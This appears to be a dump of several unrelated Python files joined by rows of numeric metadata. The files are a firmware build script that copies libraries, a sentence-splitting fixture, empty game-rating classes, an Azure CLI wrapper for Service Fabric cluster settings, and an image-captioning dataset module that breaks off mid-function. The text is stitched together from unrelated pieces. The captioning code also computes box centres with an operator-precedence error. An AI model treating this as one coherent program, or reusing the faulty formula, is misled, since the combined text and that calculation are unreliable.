src = self.srcdir + "/ywss.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/ywss/lib/mk3060/libywss.a"
elif module == "rhino":
src = self.srcdir + "/rhino.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/kernel/rhino/lib/mk3060/librhino.a"
elif module == "wsf":
src = self.srcdir + "/wsf.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/connectivity/wsf/lib/mk3060/libwsf.a"
elif module == "msdp":
src = self.srcdir + "/msdp.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/gateway/msdp/lib/mk3060/libmsdp.a"
elif module == "devmgr":
src = self.srcdir + "/devmgr.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/gateway/devmgr/lib/mk3060/libdevmgr.a"
elif module == "gateway":
src = self.srcdir + "/gateway.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/framework/gateway/lib/mk3060/libgateway.a"
else:
return 0
linux = "cp -f " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
return 1
modules.popen(cmd, shell=True, cwd=os.getcwd())
return 0
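# A minimal sketch of the helper that the repeated four-line dispatch above
# implies -- the name run_for_platform is hypothetical; it assumes error() and
# modules.popen() behave exactly as in the calls above and keeps the Python 2
# style 'linux2' platform check unchanged.
def run_for_platform(linux="", mac="", win=""):
    # Pick the command for the current OS; an empty string means "unsupported here".
    cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
    if not cmd:
        error('Unknown system!')
        return 1
    modules.popen(cmd, shell=True, cwd=os.getcwd())
    return 0
# Usage sketch: each dispatch block above collapses to a single call, e.g.
# run_for_platform(linux="rm -rf " + dst)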
| 50.714041
| 142
| 0.512949
| 3,493
| 29,617
| 4.343258
| 0.038935
| 0.067234
| 0.174807
| 0.049305
| 0.895656
| 0.886494
| 0.883528
| 0.856766
| 0.84009
| 0.835344
| 0
| 0.018587
| 0.342405
| 29,617
| 583
| 143
| 50.801029
| 0.760372
| 0.005909
| 0
| 0.766537
| 0
| 0
| 0.172055
| 0.034486
| 0.015564
| 0
| 0
| 0
| 0
| 1
| 0.011673
| false
| 0
| 0.009728
| 0
| 0.042802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe5f74d6228b5e0b2289985660b2bac191cb765a
| 286
|
py
|
Python
|
tests/factory/raw_sentences_samples.py
|
easydatapy/easytxt
|
9c2a424d3e39c50722c5b543b96c1450181f94e4
|
[
"BSD-3-Clause"
] | 4
|
2020-08-25T17:39:04.000Z
|
2020-08-31T20:14:37.000Z
|
tests/factory/raw_sentences_samples.py
|
sitegroove/easytxt
|
9c2a424d3e39c50722c5b543b96c1450181f94e4
|
[
"BSD-3-Clause"
] | null | null | null |
tests/factory/raw_sentences_samples.py
|
sitegroove/easytxt
|
9c2a424d3e39c50722c5b543b96c1450181f94e4
|
[
"BSD-3-Clause"
] | null | null | null |
english = [
(
"Mr. John and Ms. Sarah are here. Say hello!!!",
["Mr. John and Ms. Sarah are here.", "Say hello!!!"],
),
("* camera * notebook * photo", ["camera", "notebook", "photo"]),
("- camera - notebook - photo", ["camera", "notebook", "photo"]),
]
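# A minimal sanity-check sketch for fixtures of this shape: each entry pairs a
# raw string with the sentence list a splitter is expected to produce. The
# check below is an assumption about intended use, not part of easytxt itself.
def check_fixture_format(samples):
    for raw_text, expected in samples:
        assert isinstance(raw_text, str)
        assert isinstance(expected, list)
        assert all(isinstance(sentence, str) for sentence in expected)

check_fixture_format(english)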
| 31.777778
| 69
| 0.506993
| 31
| 286
| 4.677419
| 0.419355
| 0.386207
| 0.524138
| 0.517241
| 0.951724
| 0.951724
| 0.951724
| 0.951724
| 0.951724
| 0
| 0
| 0
| 0.258741
| 286
| 8
| 70
| 35.75
| 0.683962
| 0
| 0
| 0
| 0
| 0
| 0.632867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fe61a5494613c26facd55a457dc788a26a56d82b
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_akali/na_akali_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_akali/na_akali_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_akali/na_akali_top.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Akali_Top_Aatrox(Ratings):
pass
class NA_Akali_Top_Ahri(Ratings):
pass
class NA_Akali_Top_Akali(Ratings):
pass
class NA_Akali_Top_Alistar(Ratings):
pass
class NA_Akali_Top_Amumu(Ratings):
pass
class NA_Akali_Top_Anivia(Ratings):
pass
class NA_Akali_Top_Annie(Ratings):
pass
class NA_Akali_Top_Ashe(Ratings):
pass
class NA_Akali_Top_AurelionSol(Ratings):
pass
class NA_Akali_Top_Azir(Ratings):
pass
class NA_Akali_Top_Bard(Ratings):
pass
class NA_Akali_Top_Blitzcrank(Ratings):
pass
class NA_Akali_Top_Brand(Ratings):
pass
class NA_Akali_Top_Braum(Ratings):
pass
class NA_Akali_Top_Caitlyn(Ratings):
pass
class NA_Akali_Top_Camille(Ratings):
pass
class NA_Akali_Top_Cassiopeia(Ratings):
pass
class NA_Akali_Top_Chogath(Ratings):
pass
class NA_Akali_Top_Corki(Ratings):
pass
class NA_Akali_Top_Darius(Ratings):
pass
class NA_Akali_Top_Diana(Ratings):
pass
class NA_Akali_Top_Draven(Ratings):
pass
class NA_Akali_Top_DrMundo(Ratings):
pass
class NA_Akali_Top_Ekko(Ratings):
pass
class NA_Akali_Top_Elise(Ratings):
pass
class NA_Akali_Top_Evelynn(Ratings):
pass
class NA_Akali_Top_Ezreal(Ratings):
pass
class NA_Akali_Top_Fiddlesticks(Ratings):
pass
class NA_Akali_Top_Fiora(Ratings):
pass
class NA_Akali_Top_Fizz(Ratings):
pass
class NA_Akali_Top_Galio(Ratings):
pass
class NA_Akali_Top_Gangplank(Ratings):
pass
class NA_Akali_Top_Garen(Ratings):
pass
class NA_Akali_Top_Gnar(Ratings):
pass
class NA_Akali_Top_Gragas(Ratings):
pass
class NA_Akali_Top_Graves(Ratings):
pass
class NA_Akali_Top_Hecarim(Ratings):
pass
class NA_Akali_Top_Heimerdinger(Ratings):
pass
class NA_Akali_Top_Illaoi(Ratings):
pass
class NA_Akali_Top_Irelia(Ratings):
pass
class NA_Akali_Top_Ivern(Ratings):
pass
class NA_Akali_Top_Janna(Ratings):
pass
class NA_Akali_Top_JarvanIV(Ratings):
pass
class NA_Akali_Top_Jax(Ratings):
pass
class NA_Akali_Top_Jayce(Ratings):
pass
class NA_Akali_Top_Jhin(Ratings):
pass
class NA_Akali_Top_Jinx(Ratings):
pass
class NA_Akali_Top_Kalista(Ratings):
pass
class NA_Akali_Top_Karma(Ratings):
pass
class NA_Akali_Top_Karthus(Ratings):
pass
class NA_Akali_Top_Kassadin(Ratings):
pass
class NA_Akali_Top_Katarina(Ratings):
pass
class NA_Akali_Top_Kayle(Ratings):
pass
class NA_Akali_Top_Kayn(Ratings):
pass
class NA_Akali_Top_Kennen(Ratings):
pass
class NA_Akali_Top_Khazix(Ratings):
pass
class NA_Akali_Top_Kindred(Ratings):
pass
class NA_Akali_Top_Kled(Ratings):
pass
class NA_Akali_Top_KogMaw(Ratings):
pass
class NA_Akali_Top_Leblanc(Ratings):
pass
class NA_Akali_Top_LeeSin(Ratings):
pass
class NA_Akali_Top_Leona(Ratings):
pass
class NA_Akali_Top_Lissandra(Ratings):
pass
class NA_Akali_Top_Lucian(Ratings):
pass
class NA_Akali_Top_Lulu(Ratings):
pass
class NA_Akali_Top_Lux(Ratings):
pass
class NA_Akali_Top_Malphite(Ratings):
pass
class NA_Akali_Top_Malzahar(Ratings):
pass
class NA_Akali_Top_Maokai(Ratings):
pass
class NA_Akali_Top_MasterYi(Ratings):
pass
class NA_Akali_Top_MissFortune(Ratings):
pass
class NA_Akali_Top_MonkeyKing(Ratings):
pass
class NA_Akali_Top_Mordekaiser(Ratings):
pass
class NA_Akali_Top_Morgana(Ratings):
pass
class NA_Akali_Top_Nami(Ratings):
pass
class NA_Akali_Top_Nasus(Ratings):
pass
class NA_Akali_Top_Nautilus(Ratings):
pass
class NA_Akali_Top_Nidalee(Ratings):
pass
class NA_Akali_Top_Nocturne(Ratings):
pass
class NA_Akali_Top_Nunu(Ratings):
pass
class NA_Akali_Top_Olaf(Ratings):
pass
class NA_Akali_Top_Orianna(Ratings):
pass
class NA_Akali_Top_Ornn(Ratings):
pass
class NA_Akali_Top_Pantheon(Ratings):
pass
class NA_Akali_Top_Poppy(Ratings):
pass
class NA_Akali_Top_Quinn(Ratings):
pass
class NA_Akali_Top_Rakan(Ratings):
pass
class NA_Akali_Top_Rammus(Ratings):
pass
class NA_Akali_Top_RekSai(Ratings):
pass
class NA_Akali_Top_Renekton(Ratings):
pass
class NA_Akali_Top_Rengar(Ratings):
pass
class NA_Akali_Top_Riven(Ratings):
pass
class NA_Akali_Top_Rumble(Ratings):
pass
class NA_Akali_Top_Ryze(Ratings):
pass
class NA_Akali_Top_Sejuani(Ratings):
pass
class NA_Akali_Top_Shaco(Ratings):
pass
class NA_Akali_Top_Shen(Ratings):
pass
class NA_Akali_Top_Shyvana(Ratings):
pass
class NA_Akali_Top_Singed(Ratings):
pass
class NA_Akali_Top_Sion(Ratings):
pass
class NA_Akali_Top_Sivir(Ratings):
pass
class NA_Akali_Top_Skarner(Ratings):
pass
class NA_Akali_Top_Sona(Ratings):
pass
class NA_Akali_Top_Soraka(Ratings):
pass
class NA_Akali_Top_Swain(Ratings):
pass
class NA_Akali_Top_Syndra(Ratings):
pass
class NA_Akali_Top_TahmKench(Ratings):
pass
class NA_Akali_Top_Taliyah(Ratings):
pass
class NA_Akali_Top_Talon(Ratings):
pass
class NA_Akali_Top_Taric(Ratings):
pass
class NA_Akali_Top_Teemo(Ratings):
pass
class NA_Akali_Top_Thresh(Ratings):
pass
class NA_Akali_Top_Tristana(Ratings):
pass
class NA_Akali_Top_Trundle(Ratings):
pass
class NA_Akali_Top_Tryndamere(Ratings):
pass
class NA_Akali_Top_TwistedFate(Ratings):
pass
class NA_Akali_Top_Twitch(Ratings):
pass
class NA_Akali_Top_Udyr(Ratings):
pass
class NA_Akali_Top_Urgot(Ratings):
pass
class NA_Akali_Top_Varus(Ratings):
pass
class NA_Akali_Top_Vayne(Ratings):
pass
class NA_Akali_Top_Veigar(Ratings):
pass
class NA_Akali_Top_Velkoz(Ratings):
pass
class NA_Akali_Top_Vi(Ratings):
pass
class NA_Akali_Top_Viktor(Ratings):
pass
class NA_Akali_Top_Vladimir(Ratings):
pass
class NA_Akali_Top_Volibear(Ratings):
pass
class NA_Akali_Top_Warwick(Ratings):
pass
class NA_Akali_Top_Xayah(Ratings):
pass
class NA_Akali_Top_Xerath(Ratings):
pass
class NA_Akali_Top_XinZhao(Ratings):
pass
class NA_Akali_Top_Yasuo(Ratings):
pass
class NA_Akali_Top_Yorick(Ratings):
pass
class NA_Akali_Top_Zac(Ratings):
pass
class NA_Akali_Top_Zed(Ratings):
pass
class NA_Akali_Top_Ziggs(Ratings):
pass
class NA_Akali_Top_Zilean(Ratings):
pass
class NA_Akali_Top_Zyra(Ratings):
pass
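# A minimal sketch of generating these empty per-champion subclasses
# programmatically instead of writing each one out. The champion list is
# truncated for illustration, and injecting via globals() is only one option,
# not necessarily how loldib builds these modules.
for _name in ['Aatrox', 'Ahri', 'Akali']:
    globals()['NA_Akali_Top_%s_Generated' % _name] = type(
        'NA_Akali_Top_%s_Generated' % _name, (Ratings,), {})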
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
229f53030cb19ea28beec6329667d38e0b30fe6e
| 1,747
|
py
|
Python
|
pyaz/sf/cluster/setting/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sf/cluster/setting/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sf/cluster/setting/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
'''
Manage a cluster's settings.
'''
from .... pyaz_utils import _call_az
def set(cluster_name, resource_group, parameter=None, section=None, settings_section_description=None, value=None):
'''
Update the settings of a cluster.
Required Parameters:
- cluster_name -- Specify the name of the cluster; if not given, it will be the same as the resource group name
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- parameter -- parameter name
- section -- section name
- settings_section_description -- JSON encoded parameters configuration. Use @{file} to load from a file. For example: [{"section": "NamingService","parameter": "MaxOperationTimeout","value": 1000},{"section": "MaxFileOperationTimeout","parameter": "Max2","value": 1000}]
- value -- Specify the value
'''
return _call_az("az sf cluster setting set", locals())
def remove(cluster_name, resource_group, parameter=None, section=None, settings_section_description=None):
'''
Remove settings from a cluster.
Required Parameters:
- cluster_name -- Specify the name of the cluster; if not given, it will be the same as the resource group name
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- parameter -- parameter name
- section -- section name
- settings_section_description -- JSON encoded parameters configuration. Use @{file} to load from a file. For example: [{"section": "NamingService","parameter": "MaxOperationTimeout"}]
'''
return _call_az("az sf cluster setting remove", locals())
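# A minimal usage sketch for the wrappers above, as it would appear in a
# separate script (cluster and resource-group names are placeholders; it
# assumes the Azure CLI is installed and an account is logged in):
# from pyaz.sf.cluster import setting
# setting.set(cluster_name='my-cluster', resource_group='my-rg',
#             section='NamingService', parameter='MaxOperationTimeout', value='1000')
# setting.remove(cluster_name='my-cluster', resource_group='my-rg',
#                section='NamingService', parameter='MaxOperationTimeout')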
| 45.973684
| 274
| 0.721236
| 218
| 1,747
| 5.674312
| 0.279817
| 0.084074
| 0.054972
| 0.038804
| 0.829426
| 0.829426
| 0.829426
| 0.780922
| 0.780922
| 0.780922
| 0
| 0.00625
| 0.17573
| 1,747
| 37
| 275
| 47.216216
| 0.852778
| 0.71723
| 0
| 0
| 0
| 0
| 0.134177
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
22c939223b59e9c8df4e573ff3fd5354ed6af3ec
| 65,710
|
py
|
Python
|
data/field.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 32
|
2021-03-01T07:02:52.000Z
|
2022-03-30T02:38:35.000Z
|
data/field.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 6
|
2021-04-14T12:20:16.000Z
|
2022-03-11T11:21:36.000Z
|
data/field.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 3
|
2021-08-17T13:18:08.000Z
|
2022-02-10T08:15:28.000Z
|
import os
import warnings
import shutil
import numpy as np
import h5py
import pickle as pkl
import json
import random
import torch
from itertools import groupby
from speaksee.data import RawField
class COCOControlSequenceField(RawField):
def __init__(self, postprocessing=None, detections_path=None, classes_path=None,
padding_idx=0, fix_length=None, all_boxes=True, pad_init=True, pad_eos=True, dtype=torch.float32,
max_detections=20, max_length=100, sorting=False):
self.max_detections = max_detections
self.max_length = max_length
self.detections_path = detections_path
self.padding_idx = padding_idx
self.fix_length = fix_length
self.all_boxes = all_boxes
self.sorting = sorting
self.eos_token = padding_idx if pad_eos else None
self.dtype = dtype
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
super(COCOControlSequenceField, self).__init__(None, postprocessing)
def get_detections_inside(self, det_boxes, query):
cond1 = det_boxes[:, 0] >= det_boxes[query, 0]
cond2 = det_boxes[:, 1] >= det_boxes[query, 1]
cond3 = det_boxes[:, 2] <= det_boxes[query, 2]
cond4 = det_boxes[:, 3] <= det_boxes[query, 3]
cond = cond1 & cond2 & cond3 & cond4
return np.nonzero(cond)[0]
def _fill(self, cls_seq, det_features, det_boxes, selected_classes, most_probable_dets, max_len):
det_sequences = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
for j, cls in enumerate(cls_seq[:max_len]):
if cls == '_':
det_sequences[j, :det_features.shape[0]] = most_probable_dets
else:
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls]
if self.all_boxes:
det_ids = np.unique(np.concatenate([self.get_detections_inside(det_boxes, d) for d in seed_detections]))
else:
det_ids = np.unique(seed_detections)
det_sequences[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections]
if not self.sorting:
last = len(cls_seq[:max_len])
det_sequences[last:] = det_sequences[last-1]
return det_sequences.astype(np.float32)
def preprocess(self, x):
image = x[0][0]
det_classes = x[1]
max_len = self.fix_length + (self.eos_token, self.eos_token).count(None) - 2
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
most_probable_idxs = np.argsort(np.max(det_cls_probs, -1))[::-1][:self.max_detections] # indices of the max_detections most probable detections, descending
most_probable_dets = det_features[most_probable_idxs]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:])+1] for i in range(len(det_cls_probs))]
cls_seq = []
for i, cls in enumerate(det_classes):
if cls is not None:
cls_seq.append(cls)
else:
cls_ok = next((c for c in det_classes[i+1:] if c is not None), '_')
cls_seq.append(cls_ok)
cls_seq_gt = np.asarray([int(a != b) for (a, b) in zip(cls_seq[:-1], cls_seq[1:])] + [0, ])
cls_seq_gt = cls_seq_gt[:max_len]
cls_seq_gt = np.concatenate([cls_seq_gt, [self.eos_token, self.eos_token]])
cls_seq_gt = np.concatenate([cls_seq_gt, [self.padding_idx]*max(0, self.fix_length - len(cls_seq_gt))])
cls_seq_gt = cls_seq_gt.astype(np.float32)
cls_seq_test = [x[0] for x in groupby(det_classes) if x[0] is not None]
if self.sorting:
cls_seq_test.sort()
det_sequences_test = self._fill(cls_seq_test, det_features, det_boxes, selected_classes, most_probable_dets, max_len)
return det_sequences_test
else:
det_sequences = self._fill(cls_seq, det_features, det_boxes, selected_classes, most_probable_dets, max_len)
det_sequences_test = self._fill(cls_seq_test, det_features, det_boxes, selected_classes, most_probable_dets, max_len)
cls_seq_test = ' '.join(cls_seq_test)
return det_sequences, cls_seq_gt, det_sequences_test, cls_seq_test # , id_image
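# A toy sketch of the change-point target built above: for
# cls_seq = ['dog', 'dog', 'frisbee'] the pairwise inequality test yields
# [0, 1] and the appended 0 gives [0, 1, 0], i.e. a 1 wherever the controlling
# class switches; the vector is then eos-terminated and zero-padded to fix_length.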
# MSCOCO
class ImageDetectionsField(RawField):
def __init__(self, preprocessing=None, postprocessing=None, detections_path=None, max_detections=100,
sort_by_prob=False, load_in_tmp=True):
self.max_detections = max_detections
self.detections_path = detections_path
self.sort_by_prob = sort_by_prob
tmp_detections_path = os.path.join('/tmp', os.path.basename(detections_path))
if not os.path.isfile(tmp_detections_path):
if shutil.disk_usage("/tmp")[-1] < os.path.getsize(detections_path):
warnings.warn('Loading from %s, because /tmp does not have enough space.' % detections_path)
elif load_in_tmp:
warnings.warn("Copying detection file to /tmp")
shutil.copyfile(detections_path, tmp_detections_path)
self.detections_path = tmp_detections_path
warnings.warn("Done.")
else:
self.detections_path = tmp_detections_path
super(ImageDetectionsField, self).__init__(preprocessing, postprocessing)
def preprocess(self, x, avoid_precomp=False):
image_id = int(x.split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
precomp_data = f['%d_features' % image_id][()]
if self.sort_by_prob:
precomp_data = precomp_data[np.argsort(np.max(f['%d_cls_prob' % image_id][()], -1))[::-1]]
except KeyError:
warnings.warn('Could not find detections for %d' % image_id)
precomp_data = np.random.rand(10,2048)
delta = self.max_detections - precomp_data.shape[0]
if delta > 0:
precomp_data = np.concatenate([precomp_data, np.zeros((delta, precomp_data.shape[1]))], axis=0)
elif delta < 0:
precomp_data = precomp_data[:self.max_detections]
return precomp_data.astype(np.float32), image_id
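# A standalone sketch of the pad-or-truncate step above, with a hypothetical
# max_detections of 5: shorter feature matrices are zero-padded row-wise,
# longer ones are truncated.
# feats = np.random.rand(3, 2048)
# delta = 5 - feats.shape[0]  # 2, so two zero rows are appended
# feats = np.concatenate([feats, np.zeros((delta, feats.shape[1]))], axis=0)
# assert feats.shape == (5, 2048)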
# MSCOCO detection field
class COCOControlSetField(RawField):
def __init__(self, postprocessing=None, classes_path=None, img_shapes_path=None,
precomp_glove_path=None, verb_idx_path=None, idx_vs_path=None, cap_classes_path=None,
cap_verb_path=None, detections_path=None, fix_length=20, max_detections=20):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(idx_vs_path, 'r') as fp:
self.idx_2_vs = json.load(fp)
with open(cap_classes_path, 'r') as fp:
self.cap_2_classes = json.load(fp)
with open(cap_verb_path, 'r') as fp:
self.cap_2_verb = json.load(fp)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25} # END is used to predict the END of the output
super(COCOControlSetField, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[str(id_image)][caption]['verb']
idx_2_sr = self.idx_2_vs[str(id_image)][caption]['sr']
cap_2_verb = self.cap_2_verb[str(id_image)][caption]
cls_seq = self.cap_2_classes[str(id_image)][caption]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
width, height = self.img_shapes[str(id_image)]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# why set as 8?
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
# why set as 8?
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0 means "no verb"
cls_seq = cls_seq[:self.fix_length] # keep only the first fix_length entries
for j, cls in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if k == 8:
break
gt_det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0 denotes padding
gt_det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[j][k]] + 1 # 0 denotes padding
idx_list_ = np.array(cls_seq).argsort()
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
cls_seq.sort() # sort classes alphabetically, effectively shuffling the original order
for j, cls in enumerate(cls_seq):
cls_w = cls.split(',')[0].split(' ')[-1] # current class; why is it processed this way?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # indices of detections whose class matches the selected class
det_ids = np.unique(seed_detections)
# features of all regions belonging to the current class
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections]
det_sequences_visual[j] = det_features[det_ids[0]] # feature of the first region of the current class
bbox = det_boxes[det_ids[0]] # box of the first region of the current class (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # box center, x
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # box center, y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # box width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # box height
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0 denotes padding
det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[int(idx_list[j][0])][k]] + 1 # 0 denotes padding
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list
class COCODetSetField(RawField):
def __init__(self, postprocessing=None, verb_idx_path=None, detections_path=None, classes_path=None,
img_shapes_path=None, precomp_glove_path=None, cls_seq_path=None, fix_length=20, max_detections=20):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(cls_seq_path, 'r') as f:
self.img_cap_v_2_class = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25} # END is used to predict the END of the output
super(COCODetSetField, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
